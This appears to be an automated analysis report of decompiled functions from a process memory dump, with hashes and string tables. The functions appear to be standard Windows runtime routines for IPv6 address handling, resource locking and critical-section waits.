                                      • Instruction ID: e559f2022885c17d6733b422d06019f28312ce942c3b0d09baf0c36be4b6b020
                                      • Opcode Fuzzy Hash: 34d857a008bc043c351624942ec6ccef10ec937c3e465678f12fc91d82bb82b6
                                      • Instruction Fuzzy Hash: A6514E717002026FEF54CE18CC81F6637AABFC4724F214259ED59DB284EA71EC418B9C
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 64%
                                      			E025D14C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                      				signed int _v8;
                                      				char _v10;
                                      				char _v140;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t24;
                                      				void* _t26;
                                      				signed int _t29;
                                      				signed int _t34;
                                      				signed int _t40;
                                      				intOrPtr _t45;
                                      				void* _t51;
                                      				intOrPtr* _t52;
                                      				void* _t54;
                                      				signed int _t57;
                                      				void* _t58;
                                      
                                      				_t51 = __edx;
                                      				_t24 =  *0x2672088; // 0x768ef620
                                      				_v8 = _t24 ^ _t57;
                                      				_t45 = _a16;
                                      				_t53 = _a4;
                                      				_t52 = _a20;
                                      				if(_a4 == 0 || _t52 == 0) {
                                      					L10:
                                      					_t26 = 0xc000000d;
                                      				} else {
                                      					if(_t45 == 0) {
                                      						if( *_t52 == _t45) {
                                      							goto L3;
                                      						} else {
                                      							goto L10;
                                      						}
                                      					} else {
                                      						L3:
                                      						_t28 =  &_v140;
                                      						if(_a12 != 0) {
                                      							_push("[");
                                      							_push(0x41);
                                      							_push( &_v140);
                                      							_t29 = E025C7707();
                                      							_t58 = _t58 + 0xc;
                                      							_t28 = _t57 + _t29 * 2 - 0x88;
                                      						}
                                      						_t54 = E025D13CB(_t53, _t28);
                                      						if(_a8 != 0) {
                                      							_t34 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                      							_t58 = _t58 + 0x10;
                                      							_t54 = _t54 + _t34 * 2;
                                      						}
                                      						if(_a12 != 0) {
                                      							_t40 = E025C7707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                      							_t58 = _t58 + 0x10;
                                      							_t54 = _t54 + _t40 * 2;
                                      						}
                                      						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                      						 *_t52 = _t53;
                                      						if( *_t52 < _t53) {
                                      							goto L10;
                                      						} else {
                                      							E02592340(_t45,  &_v140, _t53 + _t53);
                                      							_t26 = 0;
                                      						}
                                      					}
                                      				}
                                      				return E0259E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                      			}

                                      0x025d14c0
                                      0x025d14cb
                                      0x025d14d2
                                      0x025d14d6
                                      0x025d14da
                                      0x025d14de
                                      0x025d14e3
                                      0x025d157a
                                      0x025d157a
                                      0x025d14f1
                                      0x025d14f3
                                      0x025fea0f
                                      0x00000000
                                      0x025fea15
                                      0x00000000
                                      0x025fea15
                                      0x025d14f9
                                      0x025d14f9
                                      0x025d14fe
                                      0x025d1504
                                      0x025fea1a
                                      0x025fea1f
                                      0x025fea21
                                      0x025fea22
                                      0x025fea27
                                      0x025fea2a
                                      0x025fea2a
                                      0x025d1515
                                      0x025d1517
                                      0x025d156d
                                      0x025d1572
                                      0x025d1575
                                      0x025d1575
                                      0x025d151e
                                      0x025fea50
                                      0x025fea55
                                      0x025fea58
                                      0x025fea58
                                      0x025d152e
                                      0x025d1531
                                      0x025d1533
                                      0x00000000
                                      0x025d1535
                                      0x025d1541
                                      0x025d1549
                                      0x025d1549
                                      0x025d1533
                                      0x025d14f3
                                      0x025d1559

                                      APIs
                                      • ___swprintf_l.LIBCMT ref: 025FEA22
                                        • Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D146B
                                        • Part of subcall function 025D13CB: ___swprintf_l.LIBCMT ref: 025D1490
                                      • ___swprintf_l.LIBCMT ref: 025D156D
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: ___swprintf_l
                                      • String ID: %%%u$]:%u
                                      • API String ID: 48624451-3050659472
                                      • Opcode ID: ee6e0eabb585a7e7fd355566485fb69e845862663ec02d387f8fa22f1c312fa7
                                      • Instruction ID: a9bc11d2ca549dc150ee0cb901926fcf7bdb088ca6e9439160f7912521eb5c13
                                      • Opcode Fuzzy Hash: ee6e0eabb585a7e7fd355566485fb69e845862663ec02d387f8fa22f1c312fa7
                                      • Instruction Fuzzy Hash: B421E372900619ABDF30DE68CC41AEE77ACBB54300F448426ED4AD3100EB75AE58CFE8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 44%
                                      			E025B53A5(signed int _a4, char _a8) {
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				signed int _t32;
                                      				signed int _t37;
                                      				signed int _t40;
                                      				signed int _t42;
                                      				void* _t45;
                                      				intOrPtr _t46;
                                      				signed int _t49;
                                      				void* _t51;
                                      				signed int _t57;
                                      				signed int _t64;
                                      				signed int _t71;
                                      				void* _t74;
                                      				intOrPtr _t78;
                                      				signed int* _t79;
                                      				void* _t85;
                                      				signed int _t86;
                                      				signed int _t92;
                                      				void* _t104;
                                      				void* _t105;
                                      
                                      				_t64 = _a4;
                                      				_t32 =  *(_t64 + 0x28);
                                      				_t71 = _t64 + 0x28;
                                      				_push(_t92);
                                      				if(_t32 < 0) {
                                      					_t78 =  *[fs:0x18];
                                      					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                      					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                      						goto L3;
                                      					} else {
                                      						__eflags = _t32 | 0xffffffff;
                                      						asm("lock xadd [ecx], eax");
                                      						return 1;
                                      					}
                                      				} else {
                                      					L3:
                                      					_push(_t86);
                                      					while(1) {
                                      						L4:
                                      						__eflags = _t32;
                                      						if(_t32 == 0) {
                                      							break;
                                      						}
                                      						__eflags = _a8;
                                      						if(_a8 == 0) {
                                      							__eflags = 0;
                                      							return 0;
                                      						} else {
                                      							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                      							_t79 = _t64 + 0x24;
                                      							_t71 = 1;
                                      							asm("lock xadd [eax], ecx");
                                      							_t32 =  *(_t64 + 0x28);
                                      							_a4 = _t32;
                                      							__eflags = _t32;
                                      							if(_t32 != 0) {
                                      								L19:
                                      								_t86 = 0;
                                      								__eflags = 0;
                                      								while(1) {
                                      									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                      									asm("sbb esi, esi");
                                      									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026701c0;
                                      									_push(_t92);
                                      									_push(0);
                                      									_t37 = E0258F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                      									__eflags = _t37 - 0x102;
                                      									if(_t37 != 0x102) {
                                      										break;
                                      									}
                                      									_t71 =  *(_t92 + 4);
                                      									_t85 =  *_t92;
                                      									_t51 = E025D4FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                      									_push(_t85);
                                      									_push(_t51);
                                      									E025E3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                      									E025E3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                      									_t86 = _t86 + 1;
                                      									_t105 = _t104 + 0x28;
                                      									__eflags = _t86 - 2;
                                      									if(__eflags > 0) {
                                      										E0261217A(_t71, __eflags, _t64);
                                      									}
                                      									_push("RTL: Re-Waiting\n");
                                      									_push(0);
                                      									_push(0x65);
                                      									E025E3F92();
                                      									_t104 = _t105 + 0xc;
                                      								}
                                      								__eflags = _t37;
                                      								if(__eflags < 0) {
                                      									_push(_t37);
                                      									E025D3915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                      									asm("int3");
                                      									_t40 =  *_t71;
                                      									 *_t71 = 0;
                                      									__eflags = _t40;
                                      									if(_t40 == 0) {
                                      										L1:
                                      										_t42 = E025B5384(_t92 + 0x24);
                                      										if(_t42 != 0) {
                                      											goto L31;
                                      										} else {
                                      											goto L2;
                                      										}
                                      									} else {
                                      										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                      										_push( &_a4);
                                      										_push(_t40);
                                      										_t49 = E0258F970( *((intOrPtr*)(_t92 + 0x18)));
                                      										__eflags = _t49;
                                      										if(__eflags >= 0) {
                                      											goto L1;
                                      										} else {
                                      											_push(_t49);
                                      											E025D3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                      											L31:
                                      											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                      											_push( &_a4);
                                      											_push(1);
                                      											_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
                                      											__eflags = _t42;
                                      											if(__eflags >= 0) {
                                      												L2:
                                      												return _t42;
                                      											} else {
                                      												_push(_t42);
                                      												E025D3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                      												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                      												_push( &_a4);
                                      												_push(1);
                                      												_t42 = E0258F970( *((intOrPtr*)(_t92 + 0x20)));
                                      												__eflags = _t42;
                                      												if(__eflags >= 0) {
                                      													goto L2;
                                      												} else {
                                      													_push(_t42);
                                      													_t45 = E025D3915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                      													asm("int3");
                                      													while(1) {
                                      														_t74 = _t45;
                                      														__eflags = _t45 - 1;
                                      														if(_t45 != 1) {
                                      															break;
                                      														}
                                      														_t86 = _t86 | 0xffffffff;
                                      														_t45 = _t74;
                                      														asm("lock cmpxchg [ebx], edi");
                                      														__eflags = _t45 - _t74;
                                      														if(_t45 != _t74) {
                                      															continue;
                                      														} else {
                                      															_t46 =  *[fs:0x18];
                                      															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                      															return _t46;
                                      														}
                                      														goto L37;
                                      													}
                                      													E025B5329(_t74, _t92);
                                      													_push(1);
                                      													return E025B53A5(_t92);
                                      												}
                                      											}
                                      										}
                                      									}
                                      								} else {
                                      									_t32 =  *(_t64 + 0x28);
                                      									continue;
                                      								}
                                      							} else {
                                      								_t71 =  *_t79;
                                      								__eflags = _t71;
                                      								if(__eflags > 0) {
                                      									while(1) {
                                      										_t57 = _t71;
                                      										asm("lock cmpxchg [edi], esi");
                                      										__eflags = _t57 - _t71;
                                      										if(_t57 == _t71) {
                                      											break;
                                      										}
                                      										_t71 = _t57;
                                      										__eflags = _t57;
                                      										if(_t57 > 0) {
                                      											continue;
                                      										}
                                      										break;
                                      									}
                                      									_t32 = _a4;
                                      									__eflags = _t71;
                                      								}
                                      								if(__eflags != 0) {
                                      									continue;
                                      								} else {
                                      									goto L19;
                                      								}
                                      							}
                                      						}
                                      						goto L37;
                                      					}
                                      					_t71 = _t71 | 0xffffffff;
                                      					_t32 = 0;
                                      					asm("lock cmpxchg [edx], ecx");
                                      					__eflags = 0;
                                      					if(0 != 0) {
                                      						goto L4;
                                      					} else {
                                      						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                      						return 1;
                                      					}
                                      				}
                                      				L37:
                                      			}

                                      APIs
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025F22F4
                                      Strings
                                      • RTL: Re-Waiting, xrefs: 025F2328
                                      • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025F22FC
                                      • RTL: Resource at %p, xrefs: 025F230B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
• Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
• Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                      • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                      • API String ID: 885266447-871070163
                                      • Opcode ID: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
                                      • Instruction ID: 007e2638ed58a02b8f00de3d383e54a996029c942ba36c206b65ec32ec6c149f
                                      • Opcode Fuzzy Hash: e4d12a29f9477b8b42ee75b64bc0176bc2bcb4bcf4a36dd4252c3f151132c5c7
                                      • Instruction Fuzzy Hash: E751F8B16116066BEF15DF68CC80FA67799FF88324F104659FD19DB280F761E8418BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 51%
                                      			E025BEC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				signed int _v24;
                                      				intOrPtr* _v28;
                                      				intOrPtr _v32;
                                      				signed int _v36;
                                      				intOrPtr _v40;
                                      				short _v66;
                                      				char _v72;
                                      				void* __esi;
                                      				intOrPtr _t38;
                                      				intOrPtr _t39;
                                      				signed int _t40;
                                      				intOrPtr _t42;
                                      				intOrPtr _t43;
                                      				signed int _t44;
                                      				void* _t46;
                                      				intOrPtr _t48;
                                      				signed int _t49;
                                      				intOrPtr _t50;
                                      				intOrPtr _t53;
                                      				signed char _t67;
                                      				void* _t72;
                                      				intOrPtr _t77;
                                      				intOrPtr* _t80;
                                      				intOrPtr _t84;
                                      				intOrPtr* _t85;
                                      				void* _t91;
                                      				void* _t92;
                                      				void* _t93;
                                      
                                      				_t80 = __edi;
                                      				_t75 = __edx;
                                      				_t70 = __ecx;
                                      				_t84 = _a4;
                                      				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                      					E025ADA92(__ecx, __edx, __eflags, _t84);
                                      					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                      				}
                                      				_push(0);
                                      				__eflags = _t38 - 0xffffffff;
                                      				if(_t38 == 0xffffffff) {
                                      					_t39 =  *0x267793c; // 0x0
                                      					_push(0);
                                      					_push(_t84);
                                      					_t40 = E025916C0(_t39);
                                      				} else {
                                      					_t40 = E0258F9D4(_t38);
                                      				}
                                      				_pop(_t85);
                                      				__eflags = _t40;
                                      				if(__eflags < 0) {
                                      					_push(_t40);
                                      					E025D3915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                      					asm("int3");
                                      					while(1) {
                                      						L21:
                                      						_t76 =  *[fs:0x18];
                                      						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                      						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                      						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                      							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                      							_v66 = 0x1722;
                                      							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                      							_t76 =  &_v72;
                                      							_push( &_v72);
                                      							_v28 = _t85;
                                      							_v40 =  *((intOrPtr*)(_t85 + 4));
                                      							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                      							_push(0x10);
                                      							_push(0x20402);
                                      							E025901A4( *0x7ffe0382 & 0x000000ff);
                                      						}
                                      						while(1) {
                                      							_t43 = _v8;
                                      							_push(_t80);
                                      							_push(0);
                                      							__eflags = _t43 - 0xffffffff;
                                      							if(_t43 == 0xffffffff) {
                                      								_t71 =  *0x267793c; // 0x0
                                      								_push(_t85);
                                      								_t44 = E02591F28(_t71);
                                      							} else {
                                      								_t44 = E0258F8CC(_t43);
                                      							}
                                      							__eflags = _t44 - 0x102;
                                      							if(_t44 != 0x102) {
                                      								__eflags = _t44;
                                      								if(__eflags < 0) {
                                      									_push(_t44);
                                      									E025D3915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                      									asm("int3");
                                      									E02612306(_t85);
                                      									__eflags = _t67 & 0x00000002;
                                      									if((_t67 & 0x00000002) != 0) {
                                      										_t7 = _t67 + 2; // 0x4
                                      										_t72 = _t7;
                                      										asm("lock cmpxchg [edi], ecx");
                                      										__eflags = _t67 - _t67;
                                      										if(_t67 == _t67) {
                                      											E025BEC56(_t72, _t76, _t80, _t85);
                                      										}
                                      									}
                                      									return 0;
                                      								} else {
                                      									__eflags = _v24;
                                      									if(_v24 != 0) {
                                      										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                      									}
                                      									return 2;
                                      								}
                                      								goto L36;
                                      							}
                                      							_t77 =  *((intOrPtr*)(_t80 + 4));
                                      							_push(_t67);
                                      							_t46 = E025D4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                      							_push(_t77);
                                      							E025E3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                      							_t48 =  *_t85;
                                      							_t92 = _t91 + 0x18;
                                      							__eflags = _t48 - 0xffffffff;
                                      							if(_t48 == 0xffffffff) {
                                      								_t49 = 0;
                                      								__eflags = 0;
                                      							} else {
                                      								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                      							}
                                      							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                      							_push(_t49);
                                      							_t50 = _v12;
                                      							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                      							_push(_t85);
                                      							_push( *((intOrPtr*)(_t85 + 0xc)));
                                      							_push( *((intOrPtr*)(_t50 + 0x24)));
                                      							E025E3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
                                      							_t53 =  *_t85;
                                      							_t93 = _t92 + 0x20;
                                      							_t67 = _t67 + 1;
                                      							__eflags = _t53 - 0xffffffff;
                                      							if(_t53 != 0xffffffff) {
                                      								_t71 =  *((intOrPtr*)(_t53 + 0x14));
                                      								_a4 =  *((intOrPtr*)(_t53 + 0x14));
                                      							}
                                      							__eflags = _t67 - 2;
                                      							if(_t67 > 2) {
                                      								__eflags = _t85 - 0x26720c0;
                                      								if(_t85 != 0x26720c0) {
                                      									_t76 = _a4;
                                      									__eflags = _a4 - _a8;
                                      									if(__eflags == 0) {
                                      										E0261217A(_t71, __eflags, _t85);
                                      									}
                                      								}
                                      							}
                                      							_push("RTL: Re-Waiting\n");
                                      							_push(0);
                                      							_push(0x65);
                                      							_a8 = _a4;
                                      							E025E3F92();
                                      							_t91 = _t93 + 0xc;
                                      							__eflags =  *0x7ffe0382;
                                      							if( *0x7ffe0382 != 0) {
                                      								goto L21;
                                      							}
                                      						}
                                      						goto L36;
                                      					}
                                      				} else {
                                      					return _t40;
                                      				}
                                      				L36:
                                      			}

                                      Strings
                                      • RTL: Re-Waiting, xrefs: 025F24FA
                                      • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 025F24BD
                                      • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 025F248D
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID:
                                      • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                      • API String ID: 0-3177188983
                                      • Opcode ID: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
                                      • Instruction ID: 10391aab37d86ac0652d09d32415b239b22b634e75c2ce8edc16df85a81aa95b
                                      • Opcode Fuzzy Hash: 24b091bd71a486427692f121ee1a3adf808841161547f0f1e85a86502133c496
                                      • Instruction Fuzzy Hash: 0441EDB0600205ABDB24DF64CC89FAA77A9FF84720F148A05F959DB2C0D774E941CB6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 100%
                                      			E025CFCC9(signed short* _a4, char _a7, signed short** _a8, intOrPtr _a12) {
                                      				signed int _v8;
                                      				signed int _v12;
                                      				signed int _v16;
                                      				signed int _v20;
                                      				signed int _v24;
                                      				signed int _v28;
                                      				signed int _t105;
                                      				void* _t110;
                                      				char _t114;
                                      				short _t115;
                                      				void* _t118;
                                      				signed short* _t119;
                                      				short _t120;
                                      				char _t122;
                                      				void* _t127;
                                      				void* _t130;
                                      				signed int _t136;
                                      				intOrPtr _t143;
                                      				signed int _t158;
                                      				signed short* _t164;
                                      				signed int _t167;
                                      				void* _t170;
                                      
                                      				_t158 = 0;
                                      				_t164 = _a4;
                                      				_v20 = 0;
                                      				_v24 = 0;
                                      				_v8 = 0;
                                      				_v12 = 0;
                                      				_v16 = 0;
                                      				_v28 = 0;
                                      				_t136 = 0;
                                      				while(1) {
                                      					_t167 =  *_t164 & 0x0000ffff;
                                      					if(_t167 == _t158) {
                                      						break;
                                      					}
                                      					_t118 = _v20 - _t158;
                                      					if(_t118 == 0) {
                                      						if(_t167 == 0x3a) {
                                      							if(_v12 > _t158 || _v8 > _t158) {
                                      								break;
                                      							} else {
                                      								_t119 =  &(_t164[1]);
                                      								if( *_t119 != _t167) {
                                      									break;
                                      								}
                                      								_t143 = 2;
                                      								 *((short*)(_a12 + _t136 * 2)) = 0;
                                      								_v28 = 1;
                                      								_v8 = _t143;
                                      								_t136 = _t136 + 1;
                                      								L47:
                                      								_t164 = _t119;
                                      								_v20 = _t143;
                                      								L14:
                                      								if(_v24 == _t158) {
                                      									L19:
                                      									_t164 =  &(_t164[1]);
                                      									_t158 = 0;
                                      									continue;
                                      								}
                                      								if(_v12 == _t158) {
                                      									if(_v16 > 4) {
                                      										L29:
                                      										return 0xc000000d;
                                      									}
                                      									_t120 = E025CEE02(_v24, _t158, 0x10);
                                      									_t170 = _t170 + 0xc;
                                      									 *((short*)(_a12 + _t136 * 2)) = _t120;
                                      									_t136 = _t136 + 1;
                                      									goto L19;
                                      								}
                                      								if(_v16 > 3) {
                                      									goto L29;
                                      								}
                                      								_t122 = E025CEE02(_v24, _t158, 0xa);
                                      								_t170 = _t170 + 0xc;
                                      								if(_t122 > 0xff) {
                                      									goto L29;
                                      								}
                                      								 *((char*)(_v12 + _t136 * 2 + _a12 - 1)) = _t122;
                                      								goto L19;
                                      							}
                                      						}
                                      						L21:
                                      						if(_v8 > 7 || _t167 >= 0x80) {
                                      							break;
                                      						} else {
                                      							if(E025C685D(_t167, 4) == 0) {
                                      								if(E025C685D(_t167, 0x80) != 0) {
                                      									if(_v12 > 0) {
                                      										break;
                                      									}
                                      									_t127 = 1;
                                      									_a7 = 1;
                                      									_v24 = _t164;
                                      									_v20 = 1;
                                      									_v16 = 1;
                                      									L36:
                                      									if(_v20 == _t127) {
                                      										goto L19;
                                      									}
                                      									_t158 = 0;
                                      									goto L14;
                                      								}
                                      								break;
                                      							}
                                      							_a7 = 0;
                                      							_v24 = _t164;
                                      							_v20 = 1;
                                      							_v16 = 1;
                                      							goto L19;
                                      						}
                                      					}
                                      					_t130 = _t118 - 1;
                                      					if(_t130 != 0) {
                                      						if(_t130 == 1) {
                                      							goto L21;
                                      						}
                                      						_t127 = 1;
                                      						goto L36;
                                      					}
                                      					if(_t167 >= 0x80) {
                                      						L7:
                                      						if(_t167 == 0x3a) {
                                      							_t158 = 0;
                                      							if(_v12 > 0 || _v8 > 6) {
                                      								break;
                                      							} else {
                                      								_t119 =  &(_t164[1]);
                                      								if( *_t119 != _t167) {
                                      									_v8 = _v8 + 1;
                                      									L13:
                                      									_v20 = _t158;
                                      									goto L14;
                                      								}
                                      								if(_v28 != 0) {
                                      									break;
                                      								}
                                      								_v28 = _v8 + 1;
                                      								_t143 = 2;
                                      								_v8 = _v8 + _t143;
                                      								goto L47;
                                      							}
                                      						}
                                      						if(_t167 != 0x2e || _a7 != 0 || _v12 > 2 || _v8 > 6) {
                                      							break;
                                      						} else {
                                      							_v12 = _v12 + 1;
                                      							_t158 = 0;
                                      							goto L13;
                                      						}
                                      					}
                                      					if(E025C685D(_t167, 4) != 0) {
                                      						_v16 = _v16 + 1;
                                      						goto L19;
                                      					}
                                      					if(E025C685D(_t167, 0x80) != 0) {
                                      						_v16 = _v16 + 1;
                                      						if(_v12 > 0) {
                                      							break;
                                      						}
                                      						_a7 = 1;
                                      						goto L19;
                                      					}
                                      					goto L7;
                                      				}
                                      				 *_a8 = _t164;
                                      				if(_v12 != 0) {
                                      					if(_v12 != 3) {
                                      						goto L29;
                                      					}
                                      					_v8 = _v8 + 1;
                                      				}
                                      				if(_v28 != 0 || _v8 == 7) {
                                      					if(_v20 != 1) {
                                      						if(_v20 != 2) {
                                      							goto L29;
                                      						}
                                      						 *((short*)(_a12 + _t136 * 2)) = 0;
                                      						L65:
                                      						_t105 = _v28;
                                      						if(_t105 != 0) {
                                      							_t98 = (_t105 - _v8) * 2; // 0x11
                                      							E025A8980(_a12 + _t98 + 0x10, _a12 + _t105 * 2, _v8 - _t105 + _v8 - _t105);
                                      							_t110 = 8;
                                      							E0259DFC0(_a12 + _t105 * 2, 0, _t110 - _v8 + _t110 - _v8);
                                      						}
                                      						return 0;
                                      					}
                                      					if(_v12 != 0) {
                                      						if(_v16 > 3) {
                                      							goto L29;
                                      						}
                                      						_t114 = E025CEE02(_v24, 0, 0xa);
                                      						_t170 = _t170 + 0xc;
                                      						if(_t114 > 0xff) {
                                      							goto L29;
                                      						}
                                      						 *((char*)(_v12 + _t136 * 2 + _a12)) = _t114;
                                      						goto L65;
                                      					}
                                      					if(_v16 > 4) {
                                      						goto L29;
                                      					}
                                      					_t115 = E025CEE02(_v24, 0, 0x10);
                                      					_t170 = _t170 + 0xc;
                                      					 *((short*)(_a12 + _t136 * 2)) = _t115;
                                      					goto L65;
                                      				} else {
                                      					goto L29;
                                      				}
                                      			}

                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.666311106.0000000002580000.00000040.00000001.sdmp, Offset: 02570000, based on PE: true
                                      • Associated: 0000000B.00000002.666303464.0000000002570000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666389570.0000000002660000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666397028.0000000002670000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666404273.0000000002674000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666410428.0000000002677000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666416577.0000000002680000.00000040.00000001.sdmp
                                      • Associated: 0000000B.00000002.666452455.00000000026E0000.00000040.00000001.sdmp
                                      Similarity
                                      • API ID: __fassign
                                      • String ID:
                                      • API String ID: 3965848254-0
                                      • Opcode ID: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                      • Instruction ID: dbb6071de25c8a600b18edfe1c75d2887b874fa438560ba4d7020d93dc6c19fc
                                      • Opcode Fuzzy Hash: cf2859dc65627fbf80b6c0eada531fd5cb93d2a8787631212c3d4041a421bf55
                                      • Instruction Fuzzy Hash: 7E918B71D0020AEFDF65CF98C8456AEBBB6FB85309F30846FD405A6591F7304A81CB99
                                      Uniqueness

                                      Uniqueness Score: -1.00%